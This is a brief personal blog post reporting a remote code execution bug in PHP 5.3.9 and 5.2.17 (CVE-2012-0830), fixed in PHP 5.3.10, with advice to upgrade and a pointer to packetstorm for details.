Last week a critical bug was discovered in PHP, affecting versions 5.3.9 and 5.2.17. The bug could be exploited to run arbitrary code on a remote PHP system; PHP 5.3.10 was released to fix it, so upgrade your systems. And of course Stefan Esser popped up with some wise words :)… Oh well, I still think the guy does great work.

More info about the issue can be found on packetstorm (CVE-2012-0830).

Copyright © 2013 - Thijs Lensselink - Powered by Octopress